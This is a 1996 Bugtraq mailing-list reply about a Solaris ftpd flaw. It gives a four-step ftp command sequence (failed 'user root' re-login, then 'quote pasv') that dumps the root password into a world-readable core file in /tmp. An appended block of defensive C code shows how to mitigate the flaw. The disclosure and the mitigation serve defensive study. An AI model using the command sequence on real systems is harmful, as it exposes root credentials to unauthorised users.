[3472] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (Martin Rex)
Wed Oct 16 00:30:06 1996
Date: Tue, 15 Oct 1996 18:14:08 -0400
Reply-To: Martin.Rex@sap-ag.de
From: Martin Rex <martin.rex@sap-ag.de>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199610151521.LAA03025@cam2.gsfc.nasa.gov.> from "James Poland 6-5251" at Oct 15, 96 11:21:35 am
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
SunOS 5.5:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
-Martin
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so they seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
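
Added example, not part of Martin Rex's message and not Sun's ftpd source: for the exposure reported above (a password left in a world-readable core file after a failed re-login followed by PASV), a defensive pattern in C that disables core files, scrubs the password buffer after the comparison, and gates PASV on an explicit login state. The session struct, the handler names and the reply codes they return are hypothetical, and the plaintext strcmp stands in for a real password-hash check.

```c
/* Added example: hypothetical session model, not Sun's or BSD's ftpd source. */
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

struct session {            /* hypothetical per-connection state */
    int  logged_in;         /* set only after a successful PASS */
    char passwd[64];        /* transient copy of the supplied password */
};

/* Refuse to write core files at all; returns the resulting soft limit. */
static long disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &rl) != 0 || getrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
    return (long)rl.rlim_cur;
}

/* Overwrite a secret; volatile keeps the compiler from dropping the stores. */
static void scrub(void *p, size_t n)
{
    volatile unsigned char *v = p;
    while (n--) *v++ = 0;
}

/* USER on a live session drops any earlier authentication. */
static void handle_user(struct session *s) { s->logged_in = 0; }

/* PASS: compare (stand-in for a hash check), then scrub the copy either way. */
static int handle_pass(struct session *s, const char *supplied, const char *expected)
{
    snprintf(s->passwd, sizeof s->passwd, "%s", supplied);
    s->logged_in = (strcmp(s->passwd, expected) == 0);
    scrub(s->passwd, sizeof s->passwd);
    return s->logged_in ? 230 : 530;
}

/* PASV: gate on session state, not on whether a passwd pointer happens to be set. */
static int handle_pasv(const struct session *s) { return s->logged_in ? 227 : 530; }

int main(void)
{
    struct session s = { 0, "" };
    printf("core limit: %ld\n", disable_core_dumps());
    handle_user(&s); handle_pass(&s, "constructed-secret", "constructed-secret");
    handle_user(&s); handle_pass(&s, "wrongpasswd", "constructed-root-secret");
    printf("PASV after failed re-login: %d\n", handle_pasv(&s));
    return 0;
}
```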